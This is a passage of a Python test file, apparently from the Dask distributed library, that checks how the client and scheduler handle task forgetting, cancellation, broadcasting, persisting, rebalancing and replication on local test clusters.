assert x.key not in s.tasks
assert z.key not in s.tasks
assert not s.tasks[y.key].dependents
s.client_releases_keys(keys=[y.key], client=c.id)
assert not s.tasks
@gen_cluster(client=True)
async def test_forget_complex(e, s, A, B):
a, b, c, d = await e.scatter(list(range(4)))
ab = e.submit(add, a, b)
cd = e.submit(add, c, d)
ac = e.submit(add, a, c)
acab = e.submit(add, ac, ab)
await wait([a, b, c, d, ab, ac, cd, acab])
assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
s.client_releases_keys(keys=[ab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ab, ac, cd, acab, a, b, c, d]}
s.client_releases_keys(keys=[b.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac, cd, acab, a, c, d]}
s.client_releases_keys(keys=[acab.key], client=e.id)
assert set(s.tasks) == {f.key for f in [ac, cd, a, c, d]}
assert b.key not in s.tasks
start = time()
while b.key in A.data or b.key in B.data:
await asyncio.sleep(0.01)
assert time() < start + 10
s.client_releases_keys(keys=[ac.key], client=e.id)
assert set(s.tasks) == {f.key for f in [cd, a, c, d]}
@gen_cluster(client=True)
async def test_forget_in_flight(e, s, A, B):
delayed2 = partial(delayed, pure=True)
a, b, c, d = [delayed2(slowinc)(i) for i in range(4)]
ab = delayed2(slowadd)(a, b, dask_key_name="ab")
cd = delayed2(slowadd)(c, d, dask_key_name="cd")
ac = delayed2(slowadd)(a, c, dask_key_name="ac")
acab = delayed2(slowadd)(ac, ab, dask_key_name="acab")
x, y = e.compute([ac, acab])
s.validate_state()
for i in range(5):
await asyncio.sleep(0.01)
s.validate_state()
s.client_releases_keys(keys=[y.key], client=e.id)
s.validate_state()
for k in [acab.key, ab.key, b.key]:
assert k not in s.tasks
@gen_cluster(client=True)
async def test_forget_errors(c, s, a, b):
x = c.submit(div, 1, 0)
y = c.submit(inc, x)
z = c.submit(inc, y)
await wait([y])
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key in s.exceptions_blame
s.client_releases_keys(keys=[z.key], client=c.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[x.key], client=c.id)
assert x.key in s.exceptions
assert x.key in s.exceptions_blame
assert y.key in s.exceptions_blame
assert z.key not in s.exceptions_blame
s.client_releases_keys(keys=[y.key], client=c.id)
assert x.key not in s.exceptions
assert x.key not in s.exceptions_blame
assert y.key not in s.exceptions_blame
assert z.key not in s.exceptions_blame
def test_repr_sync(c):
s = str(c)
r = repr(c)
assert c.scheduler.address in s
assert c.scheduler.address in r
assert str(2) in s # nworkers
assert "cores" in s or "threads" in s
@gen_cluster(client=True)
async def test_waiting_data(c, s, a, b):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(add, x, y, workers=[a.ip], allow_other_workers=True)
await wait([x, y, z])
assert not s.waiting_data.get(x.key)
assert not s.waiting_data.get(y.key)
@gen_cluster()
async def test_multi_client(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
assert set(s.client_comms) == {c.id, f.id}
x = c.submit(inc, 1)
y = f.submit(inc, 2)
y2 = c.submit(inc, 2)
assert y.key == y2.key
await wait([x, y])
assert s.wants_what == {
c.id: {x.key, y.key},
f.id: {y.key},
"fire-and-forget": set(),
}
assert s.who_wants == {x.key: {c.id}, y.key: {c.id, f.id}}
await c.close()
start = time()
while c.id in s.wants_what:
await asyncio.sleep(0.01)
assert time() < start + 5
assert c.id not in s.wants_what
assert c.id not in s.who_wants[y.key]
assert x.key not in s.who_wants
await f.close()
start = time()
while s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 2, s.tasks
def long_running_client_connection(address):
with pristine_loop():
c = Client(address)
x = c.submit(lambda x: x + 1, 10)
x.result()
sleep(100)
@gen_cluster()
async def test_cleanup_after_broken_client_connection(s, a, b):
proc = mp_context.Process(target=long_running_client_connection, args=(s.address,))
proc.daemon = True
proc.start()
start = time()
while not s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 5
proc.terminate()
start = time()
while s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 5
@gen_cluster()
async def test_multi_garbage_collection(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
x = c.submit(inc, 1)
y = f.submit(inc, 2)
y2 = c.submit(inc, 2)
assert y.key == y2.key
await wait([x, y])
x.__del__()
start = time()
while x.key in a.data or x.key in b.data:
await asyncio.sleep(0.01)
assert time() < start + 5
assert s.wants_what == {c.id: {y.key}, f.id: {y.key}, "fire-and-forget": set()}
assert s.who_wants == {y.key: {c.id, f.id}}
y.__del__()
start = time()
while x.key in s.wants_what[f.id]:
await asyncio.sleep(0.01)
assert time() < start + 5
await asyncio.sleep(0.1)
assert y.key in a.data or y.key in b.data
assert s.wants_what == {c.id: {y.key}, f.id: set(), "fire-and-forget": set()}
assert s.who_wants == {y.key: {c.id}}
y2.__del__()
start = time()
while y.key in a.data or y.key in b.data:
await asyncio.sleep(0.01)
assert time() < start + 5
assert not any(v for v in s.wants_what.values())
assert not s.who_wants
await c.close()
await f.close()
@gen_cluster(client=True)
async def test__broadcast(c, s, a, b):
x, y = await c.scatter([1, 2], broadcast=True)
assert a.data == b.data == {x.key: 1, y.key: 2}
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test__broadcast_integer(c, s, *workers):
x, y = await c.scatter([1, 2], broadcast=2)
assert len(s.tasks[x.key].who_has) == 2
assert len(s.tasks[y.key].who_has) == 2
@gen_cluster(client=True)
async def test__broadcast_dict(c, s, a, b):
d = await c.scatter({"x": 1}, broadcast=True)
assert a.data == b.data == {"x": 1}
def test_broadcast(c, s, a, b):
x, y = c.scatter([1, 2], broadcast=True)
has_what = sync(c.loop, c.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
a["address"]: {x.key, y.key},
b["address"]: {x.key, y.key},
}
[z] = c.scatter([3], broadcast=True, workers=[a["address"]])
has_what = sync(c.loop, c.scheduler.has_what)
assert {k: set(v) for k, v in has_what.items()} == {
a["address"]: {x.key, y.key, z.key},
b["address"]: {x.key, y.key},
}
@gen_cluster(client=True)
async def test_proxy(c, s, a, b):
msg = await c.scheduler.proxy(msg={"op": "identity"}, worker=a.address)
assert msg["id"] == a.identity()["id"]
@gen_cluster(client=True)
async def test__cancel(c, s, a, b):
x = c.submit(slowinc, 1)
y = c.submit(slowinc, x)
while y.key not in s.tasks:
await asyncio.sleep(0.01)
await c.cancel([x])
assert x.cancelled()
assert "cancel" in str(x)
s.validate_state()
start = time()
while not y.cancelled():
await asyncio.sleep(0.01)
assert time() < start + 5
assert not s.tasks
s.validate_state()
@gen_cluster(client=True)
async def test_cancel_tuple_key(c, s, a, b):
x = c.submit(inc, 1, key=("x", 0, 1))
await x
await c.cancel(x)
with pytest.raises(CancelledError):
await x
@gen_cluster()
async def test_cancel_multi_client(s, a, b):
c = await Client(s.address, asynchronous=True)
f = await Client(s.address, asynchronous=True)
x = c.submit(slowinc, 1)
y = f.submit(slowinc, 1)
assert x.key == y.key
await c.cancel([x])
assert x.cancelled()
assert not y.cancelled()
start = time()
while y.key not in s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 5
out = await y
assert out == 2
with pytest.raises(CancelledError):
await x
await c.close()
await f.close()
@gen_cluster(client=True)
async def test_cancel_collection(c, s, a, b):
L = c.map(double, [[1], [2], [3]])
x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
await c.cancel(x)
await c.cancel([x])
assert all(f.cancelled() for f in L)
start = time()
while s.tasks:
assert time() < start + 1
await asyncio.sleep(0.01)
def test_cancel(c):
x = c.submit(slowinc, 1, key="x")
y = c.submit(slowinc, x, key="y")
z = c.submit(slowinc, y, key="z")
c.cancel([y])
start = time()
while not z.cancelled():
sleep(0.01)
assert time() < start + 5
assert x.result() == 2
z.cancel()
assert z.cancelled()
@gen_cluster(client=True)
async def test_future_type(c, s, a, b):
x = c.submit(inc, 1)
await wait([x])
assert x.type == int
assert "int" in str(x)
@gen_cluster(client=True)
async def test_traceback_clean(c, s, a, b):
x = c.submit(div, 1, 0)
try:
await x
except Exception as e:
f = e
exc_type, exc_value, tb = sys.exc_info()
while tb:
assert "scheduler" not in tb.tb_frame.f_code.co_filename
assert "worker" not in tb.tb_frame.f_code.co_filename
tb = tb.tb_next
@gen_cluster(client=True)
async def test_map_differnet_lengths(c, s, a, b):
assert len(c.map(add, [1, 2], [1, 2, 3])) == 2
def test_Future_exception_sync_2(loop, capsys):
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
assert dask.base.get_scheduler() == c.get
out, err = capsys.readouterr()
assert len(out.strip().split("\n")) == 1
assert dask.base.get_scheduler() != c.get
@gen_cluster(timeout=60, client=True)
async def test_async_persist(c, s, a, b):
from dask.delayed import Delayed, delayed
x = delayed(1)
y = delayed(inc)(x)
z = delayed(dec)(x)
w = delayed(add)(y, z)
yy, ww = c.persist([y, w])
assert type(yy) == type(y)
assert type(ww) == type(w)
assert len(yy.dask) == 1
assert len(ww.dask) == 1
assert len(w.dask) > 1
assert y.__dask_keys__() == yy.__dask_keys__()
assert w.__dask_keys__() == ww.__dask_keys__()
while y.key not in s.tasks and w.key not in s.tasks:
await asyncio.sleep(0.01)
assert s.who_wants[y.key] == {c.id}
assert s.who_wants[w.key] == {c.id}
yyf, wwf = c.compute([yy, ww])
yyy, www = await c.gather([yyf, wwf])
assert yyy == inc(1)
assert www == add(inc(1), dec(1))
assert isinstance(c.persist(y), Delayed)
assert isinstance(c.persist([y]), (list, tuple))
@gen_cluster(client=True)
async def test__persist(c, s, a, b):
pytest.importorskip("dask.array")
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = c.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy.__dask_keys__() == y.__dask_keys__()
g, h = c.compute([y, yy])
gg, hh = await c.gather([g, h])
assert (gg == hh).all()
def test_persist(c):
pytest.importorskip("dask.array")
import dask.array as da
x = da.ones((10, 10), chunks=(5, 10))
y = 2 * (x + 1)
assert len(y.dask) == 6
yy = c.persist(y)
assert len(y.dask) == 6
assert len(yy.dask) == 2
assert all(isinstance(v, Future) for v in yy.dask.values())
assert yy.__dask_keys__() == y.__dask_keys__()
zz = yy.compute()
z = y.compute()
assert (zz == z).all()
@gen_cluster(timeout=60, client=True)
async def test_long_traceback(c, s, a, b):
from distributed.protocol.pickle import dumps
def deep(n):
if n == 0:
1 / 0
else:
return deep(n - 1)
x = c.submit(deep, 200)
await wait([x])
assert len(dumps(c.futures[x.key].traceback)) < 10000
assert isinstance(c.futures[x.key].exception, ZeroDivisionError)
@gen_cluster(client=True)
async def test_wait_on_collections(c, s, a, b):
L = c.map(double, [[1], [2], [3]])
x = db.Bag({("b", i): f for i, f in enumerate(L)}, "b", 3)
await wait(x)
assert all(f.key in a.data or f.key in b.data for f in L)
@gen_cluster(client=True)
async def test_futures_of_get(c, s, a, b):
x, y, z = c.map(inc, [1, 2, 3])
assert set(futures_of(0)) == set()
assert set(futures_of(x)) == {x}
assert set(futures_of([x, y, z])) == {x, y, z}
assert set(futures_of([x, [y], [[z]]])) == {x, y, z}
assert set(futures_of({"x": x, "y": [y]})) == {x, y}
b = db.Bag({("b", i): f for i, f in enumerate([x, y, z])}, "b", 3)
assert set(futures_of(b)) == {x, y, z}
sg = SubgraphCallable(
{"x": x, "y": y, "z": z, "out": (add, (add, (add, x, y), z), "in")},
"out",
("in",),
)
assert set(futures_of(sg)) == {x, y, z}
def test_futures_of_class():
da = pytest.importorskip("dask.array")
assert futures_of([da.Array]) == []
@gen_cluster(client=True)
async def test_futures_of_cancelled_raises(c, s, a, b):
x = c.submit(inc, 1)
await c.cancel([x])
with pytest.raises(CancelledError):
await x
with pytest.raises(CancelledError):
await c.get({"x": (inc, x), "y": (inc, 2)}, ["x", "y"], sync=False)
with pytest.raises(CancelledError):
c.submit(inc, x)
with pytest.raises(CancelledError):
c.submit(add, 1, y=x)
with pytest.raises(CancelledError):
c.map(add, [1], y=x)
assert "y" not in s.tasks
@pytest.mark.skip
@gen_cluster(nthreads=[("127.0.0.1", 1)], client=True)
async def test_dont_delete_recomputed_results(c, s, w):
x = c.submit(inc, 1) # compute first time
await wait([x])
x.__del__() # trigger garbage collection
await asyncio.sleep(0)
xx = c.submit(inc, 1) # compute second time
start = time()
while xx.key not in w.data: # data shows up
await asyncio.sleep(0.01)
assert time() < start + 1
while time() < start + (s.delete_interval + 100) / 1000: # and stays
assert xx.key in w.data
await asyncio.sleep(0.01)
@gen_cluster(nthreads=[], client=True)
async def test_fatally_serialized_input(c, s):
o = FatallySerializedObject()
future = c.submit(inc, o)
while not s.tasks:
await asyncio.sleep(0.01)
@pytest.mark.skip(reason="Use fast random selection now")
@gen_cluster(client=True)
async def test_balance_tasks_by_stacks(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
y = c.submit(inc, 2)
await wait(y)
assert len(a.data) == len(b.data) == 1
@gen_cluster(client=True)
async def test_run(c, s, a, b):
results = await c.run(inc, 1)
assert results == {a.address: 2, b.address: 2}
results = await c.run(inc, 1, workers=[a.address])
assert results == {a.address: 2}
results = await c.run(inc, 1, workers=[])
assert results == {}
@gen_cluster(client=True)
async def test_run_handles_picklable_data(c, s, a, b):
futures = c.map(inc, range(10))
await wait(futures)
def func():
return {}, set(), [], (), 1, "hello", b"100"
results = await c.run_on_scheduler(func)
assert results == func()
results = await c.run(func)
assert results == {w.address: func() for w in [a, b]}
def test_run_sync(c, s, a, b):
def func(x, y=10):
return x + y
result = c.run(func, 1, y=2)
assert result == {a["address"]: 3, b["address"]: 3}
result = c.run(func, 1, y=2, workers=[a["address"]])
assert result == {a["address"]: 3}
@gen_cluster(client=True)
async def test_run_coroutine(c, s, a, b):
results = await c.run(geninc, 1, delay=0.05)
assert results == {a.address: 2, b.address: 2}
results = await c.run(geninc, 1, delay=0.05, workers=[a.address])
assert results == {a.address: 2}
results = await c.run(geninc, 1, workers=[])
assert results == {}
with pytest.raises(RuntimeError, match="hello"):
await c.run(throws, 1)
results = await c.run(asyncinc, 2, delay=0.01)
assert results == {a.address: 3, b.address: 3}
def test_run_coroutine_sync(c, s, a, b):
result = c.run(geninc, 2, delay=0.01)
assert result == {a["address"]: 3, b["address"]: 3}
result = c.run(geninc, 2, workers=[a["address"]])
assert result == {a["address"]: 3}
t1 = time()
result = c.run(geninc, 2, delay=10, wait=False)
t2 = time()
assert result is None
assert t2 - t1 <= 1.0
def test_run_exception(c):
def raise_exception(exc_type, exc_msg):
raise exc_type(exc_msg)
for exc_type in [ValueError, RuntimeError]:
with pytest.raises(exc_type, match="informative message"):
c.run(raise_exception, exc_type, "informative message")
def test_diagnostic_ui(loop):
with cluster() as (s, [a, b]):
a_addr = a["address"]
b_addr = b["address"]
with Client(s["address"], loop=loop) as c:
d = c.nthreads()
assert d == {a_addr: 1, b_addr: 1}
d = c.nthreads([a_addr])
assert d == {a_addr: 1}
d = c.nthreads(a_addr)
assert d == {a_addr: 1}
d = c.nthreads(a["address"])
assert d == {a_addr: 1}
x = c.submit(inc, 1)
y = c.submit(inc, 2)
z = c.submit(inc, 3)
wait([x, y, z])
d = c.who_has()
assert set(d) == {x.key, y.key, z.key}
assert all(w in [a_addr, b_addr] for v in d.values() for w in v)
assert all(d.values())
d = c.who_has([x, y])
assert set(d) == {x.key, y.key}
d = c.who_has(x)
assert set(d) == {x.key}
d = c.has_what()
assert set(d) == {a_addr, b_addr}
assert all(k in [x.key, y.key, z.key] for v in d.values() for k in v)
d = c.has_what([a_addr])
assert set(d) == {a_addr}
d = c.has_what(a_addr)
assert set(d) == {a_addr}
def test_diagnostic_nbytes_sync(c):
incs = c.map(inc, [1, 2, 3])
doubles = c.map(double, [1, 2, 3])
wait(incs + doubles)
assert c.nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
assert c.nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_cluster(client=True)
async def test_diagnostic_nbytes(c, s, a, b):
incs = c.map(inc, [1, 2, 3])
doubles = c.map(double, [1, 2, 3])
await wait(incs + doubles)
assert s.get_nbytes(summary=False) == {k.key: sizeof(1) for k in incs + doubles}
assert s.get_nbytes(summary=True) == {"inc": sizeof(1) * 3, "double": sizeof(1) * 3}
@gen_test()
async def test_worker_aliases():
s = await Scheduler(validate=True, port=0)
a = Worker(s.address, name="alice")
b = Worker(s.address, name="bob")
w = Worker(s.address, name=3)
await asyncio.gather(a, b, w)
c = await Client(s.address, asynchronous=True)
L = c.map(inc, range(10), workers="alice")
future = await c.scatter(123, workers=3)
await wait(L)
assert len(a.data) == 10
assert len(b.data) == 0
assert dict(w.data) == {future.key: 123}
for i, alias in enumerate([3, [3], "alice"]):
result = await c.submit(lambda x: x + 1, i, workers=alias)
assert result == i + 1
await c.close()
await asyncio.gather(a.close(), b.close(), w.close())
await s.close()
def test_persist_get_sync(c):
dadd = delayed(add)
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = c.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
assert xxyy3.compute() == ((1 + 1) + (2 + 2)) + 10
@gen_cluster(client=True)
async def test_persist_get(c, s, a, b):
dadd = delayed(add)
x, y = delayed(1), delayed(2)
xx = delayed(add)(x, x)
yy = delayed(add)(y, y)
xxyy = delayed(add)(xx, yy)
xxyy2 = c.persist(xxyy)
xxyy3 = delayed(add)(xxyy2, 10)
await asyncio.sleep(0.5)
result = await c.gather(c.get(xxyy3.dask, xxyy3.__dask_keys__(), sync=False))
assert result[0] == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
result = await c.compute(xxyy3)
assert result == ((1 + 1) + (2 + 2)) + 10
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
def test_client_num_fds(loop):
psutil = pytest.importorskip("psutil")
with cluster() as (s, [a, b]):
proc = psutil.Process()
with Client(s["address"], loop=loop) as c: # first client to start loop
before = proc.num_fds() # measure
for i in range(4):
with Client(s["address"], loop=loop): # start more clients
pass
start = time()
while proc.num_fds() > before:
sleep(0.01)
assert time() < start + 4
@gen_cluster()
async def test_startup_close_startup(s, a, b):
c = await Client(s.address, asynchronous=True)
await c.close()
c = await Client(s.address, asynchronous=True)
await c.close()
def test_startup_close_startup_sync(loop):
with cluster() as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
sleep(0.1)
with Client(s["address"]) as c:
pass
with Client(s["address"]) as c:
pass
sleep(0.1)
with Client(s["address"]) as c:
pass
@gen_cluster(client=True)
async def test_badly_serialized_exceptions(c, s, a, b):
def f():
class BadlySerializedException(Exception):
def __reduce__(self):
raise TypeError()
raise BadlySerializedException("hello world")
x = c.submit(f)
try:
result = await x
except Exception as e:
assert "hello world" in str(e)
else:
assert False
@gen_cluster(client=True)
async def test_rebalance(c, s, a, b):
aws = s.workers[a.address]
bws = s.workers[b.address]
x, y = await c.scatter([1, 2], workers=[a.address])
assert len(a.data) == 2
assert len(b.data) == 0
s.validate_state()
await c.rebalance()
s.validate_state()
assert len(b.data) == 1
assert {ts.key for ts in bws.has_what} == set(b.data)
assert bws in s.tasks[x.key].who_has or bws in s.tasks[y.key].who_has
assert len(a.data) == 1
assert {ts.key for ts in aws.has_what} == set(a.data)
assert aws not in s.tasks[x.key].who_has or aws not in s.tasks[y.key].who_has
@gen_cluster(nthreads=[("127.0.0.1", 1)] * 4, client=True)
async def test_rebalance_workers(e, s, a, b, c, d):
w, x, y, z = await e.scatter([1, 2, 3, 4], workers=[a.address])
assert len(a.data) == 4
assert len(b.data) == 0
assert len(c.data) == 0
assert len(d.data) == 0
await e.rebalance([x, y], workers=[a.address, c.address])
assert len(a.data) == 3
assert len(b.data) == 0
assert len(c.data) == 1
assert len(d.data) == 0
assert c.data == {x.key: 2} or c.data == {y.key: 3}
await e.rebalance()
assert len(a.data) == 1
assert len(b.data) == 1
assert len(c.data) == 1
assert len(d.data) == 1
s.validate_state()
@gen_cluster(client=True)
async def test_rebalance_execution(c, s, a, b):
futures = c.map(inc, range(10), workers=a.address)
await c.rebalance(futures)
assert len(a.data) == len(b.data) == 5
s.validate_state()
def test_rebalance_sync(c, s, a, b):
futures = c.map(inc, range(10), workers=[a["address"]])
c.rebalance(futures)
has_what = c.has_what()
assert len(has_what) == 2
assert list(valmap(len, has_what).values()) == [5, 5]
@gen_cluster(client=True)
async def test_rebalance_unprepared(c, s, a, b):
futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
await asyncio.sleep(0.1)
await c.rebalance(futures)
s.validate_state()
@gen_cluster(client=True)
async def test_rebalance_raises_missing_data(c, s, a, b):
with pytest.raises(ValueError, match="keys were found to be missing"):
futures = await c.scatter(range(100))
keys = [f.key for f in futures]
del futures
await c.rebalance(keys)
@gen_cluster(client=True)
async def test_receive_lost_key(c, s, a, b):
x = c.submit(inc, 1, workers=[a.address])
await x
await a.close()
start = time()
while x.status == "finished":
assert time() < start + 5
await asyncio.sleep(0.01)
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_unrunnable_task_runs(c, s, a, b):
x = c.submit(inc, 1, workers=[a.ip])
await x
await a.close()
start = time()
while x.status == "finished":
assert time() < start + 5
await asyncio.sleep(0.01)
assert s.tasks[x.key] in s.unrunnable
assert s.get_task_status(keys=[x.key]) == {x.key: "no-worker"}
w = await Worker(s.address, loop=s.loop)
start = time()
while x.status != "finished":
assert time() < start + 2
await asyncio.sleep(0.01)
assert s.tasks[x.key] not in s.unrunnable
result = await x
assert result == 2
await w.close()
@gen_cluster(client=True, nthreads=[])
async def test_add_worker_after_tasks(c, s):
futures = c.map(inc, range(10))
n = await Nanny(s.address, nthreads=2, loop=s.loop, port=0)
await c.gather(futures)
await n.close()
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster([("127.0.0.1", 1), ("127.0.0.2", 2)], client=True)
async def test_workers_register_indirect_data(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
y = c.submit(inc, x, workers=b.ip)
await y
assert b.data[x.key] == 1
assert s.tasks[x.key].who_has == {s.workers[a.address], s.workers[b.address]}
assert s.workers[b.address].has_what == {s.tasks[x.key], s.tasks[y.key]}
s.validate_state()
@gen_cluster(client=True)
async def test_submit_on_cancelled_future(c, s, a, b):
x = c.submit(inc, 1)
await x
await c.cancel(x)
with pytest.raises(CancelledError):
c.submit(inc, x)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate(c, s, *workers):
[a, b] = await c.scatter([1, 2])
await s.replicate(keys=[a.key, b.key], n=5)
s.validate_state()
assert len(s.tasks[a.key].who_has) == 5
assert len(s.tasks[b.key].who_has) == 5
assert sum(a.key in w.data for w in workers) == 5
assert sum(b.key in w.data for w in workers) == 5
@gen_cluster(client=True)
async def test_replicate_tuple_keys(c, s, a, b):
x = delayed(inc)(1, dask_key_name=("x", 1))
f = c.persist(x)
await c.replicate(f, n=5)
s.validate_state()
assert a.data and b.data
await c.rebalance(f)
s.validate_state()
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate_workers(c, s, *workers):
[a, b] = await c.scatter([1, 2], workers=[workers[0].address])
await s.replicate(
keys=[a.key, b.key], n=5, workers=[w.address for w in workers[:5]]
)
assert len(s.tasks[a.key].who_has) == 5
assert len(s.tasks[b.key].who_has) == 5
assert sum(a.key in w.data for w in workers[:5]) == 5
assert sum(b.key in w.data for w in workers[:5]) == 5
assert sum(a.key in w.data for w in workers[5:]) == 0
assert sum(b.key in w.data for w in workers[5:]) == 0
await s.replicate(keys=[a.key, b.key], n=1)
assert len(s.tasks[a.key].who_has) == 1
assert len(s.tasks[b.key].who_has) == 1
assert sum(a.key in w.data for w in workers) == 1
assert sum(b.key in w.data for w in workers) == 1
s.validate_state()
await s.replicate(keys=[a.key, b.key], n=None) # all
assert len(s.tasks[a.key].who_has) == 10
assert len(s.tasks[b.key].who_has) == 10
s.validate_state()
await s.replicate(
keys=[a.key, b.key], n=1, workers=[w.address for w in workers[:5]]
)
assert sum(a.key in w.data for w in workers[:5]) == 1
assert sum(b.key in w.data for w in workers[:5]) == 1
assert sum(a.key in w.data for w in workers[5:]) == 5
assert sum(b.key in w.data for w in workers[5:]) == 5
s.validate_state()
class CountSerialization:
def __init__(self):
self.n = 0
def __setstate__(self, n):
self.n = n + 1
def __getstate__(self):
return self.n
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_replicate_tree_branching(c, s, *workers):
obj = CountSerialization()
[future] = await c.scatter([obj])
await s.replicate(keys=[future.key], n=10)
max_count = max(w.data[future.key].n for w in workers)
assert max_count > 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_client_replicate(c, s, *workers):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
await c.replicate([x, y], n=5)
assert len(s.tasks[x.key].who_has) == 5
assert len(s.tasks[y.key].who_has) == 5
await c.replicate([x, y], n=3)
assert len(s.tasks[x.key].who_has) == 3
assert len(s.tasks[y.key].who_has) == 3
await c.replicate([x, y])
s.validate_state()
assert len(s.tasks[x.key].who_has) == 10
assert len(s.tasks[y.key].who_has) == 10
@pytest.mark.skipif(
not sys.platform.startswith("linux"), reason="Need 127.0.0.2 to mean localhost"
)
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 1), ("127.0.0.2", 1), ("127.0.0.2", 1)],
timeout=None,
)
async def test_client_replicate_host(client, s, a, b, c):
aws = s.workers[a.address]
bws = s.workers[b.address]
cws = s.workers[c.address]
x = client.submit(inc, 1, workers="127.0.0.2")
await wait([x])
assert s.tasks[x.key].who_has == {bws} or s.tasks[x.key].who_has == {cws}
await client.replicate([x], workers=["127.0.0.2"])
assert s.tasks[x.key].who_has == {bws, cws}
await client.replicate([x], workers=["127.0.0.1"])
assert s.tasks[x.key].who_has == {aws, bws, cws}
def test_client_replicate_sync(c):
x = c.submit(inc, 1)
y = c.submit(inc, 2)
c.replicate([x, y], n=2)
who_has = c.who_has()
assert len(who_has[x.key]) == len(who_has[y.key]) == 2
with pytest.raises(ValueError):
c.replicate([x], n=0)
assert y.result() == 3
@pytest.mark.skipif(WINDOWS, reason="Windows timer too coarse-grained")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 1)
async def test_task_load_adapts_quickly(c, s, a):
future = c.submit(slowinc, 1, delay=0.2) # slow
await wait(future)
assert 0.15 < s.task_prefixes["slowinc"].duration_average < 0.4
futures = c.map(slowinc, range(10), delay=0) # very fast
await wait(futures)
assert 0 < s.task_prefixes["slowinc"].duration_average < 0.1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
async def test_even_load_after_fast_functions(c, s, a, b):
x = c.submit(inc, 1, workers=a.address) # very fast
y = c.submit(inc, 2, workers=b.address) # very fast
await wait([x, y])
futures = c.map(inc, range(2, 11))
await wait(futures)
assert any(f.key in a.data for f in futures)
assert any(f.key in b.data for f in futures)
# assert abs(len(a.data) - len(b.data)) <= 3
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 2)
async def test_even_load_on_startup(c, s, a, b):
x, y = c.map(inc, [1, 2])
await wait([x, y])
assert len(a.data) == len(b.data) == 1
@pytest.mark.skip
@gen_cluster(client=True, nthreads=[("127.0.0.1", 2)] * 2)
async def test_contiguous_load(c, s, a, b):
w, x, y, z = c.map(inc, [1, 2, 3, 4])
await wait([w, x, y, z])
groups = [set(a.data), set(b.data)]
assert {w.key, x.key} in groups
assert {y.key, z.key} in groups
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_balanced_with_submit(c, s, *workers):
L = [c.submit(slowinc, i) for i in range(4)]
await wait(L)
for w in workers:
assert len(w.data) == 1
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_balanced_with_submit_and_resident_data(c, s, *workers):
[x] = await c.scatter([10], broadcast=True)
L = [c.submit(slowinc, x, pure=False) for i in range(4)]
await wait(L)
for w in workers:
assert len(w.data) == 2
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
async def test_scheduler_saturates_cores(c, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = c.map(slowinc, range(100), delay=delay)
futures = c.map(slowinc, futures, delay=delay / 10)
while not s.tasks:
if s.tasks:
assert all(
len(p) >= 20
for w in s.workers.values()
for p in w.processing.values()
)
await asyncio.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 20)] * 2)
async def test_scheduler_saturates_cores_random(c, s, a, b):
for delay in [0, 0.01, 0.1]:
futures = c.map(randominc, range(100), scale=0.1)
while not s.tasks:
if s.tasks:
assert all(
len(p) >= 20
for w in s.workers.values()
for p in w.processing.values()
)
await asyncio.sleep(0.01)
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 4)
async def test_cancel_clears_processing(c, s, *workers):
da = pytest.importorskip("dask.array")
x = c.submit(slowinc, 1, delay=0.2)
while not s.tasks:
await asyncio.sleep(0.01)
await c.cancel(x)
start = time()
while any(v for w in s.workers.values() for v in w.processing):
assert time() < start + 0.2
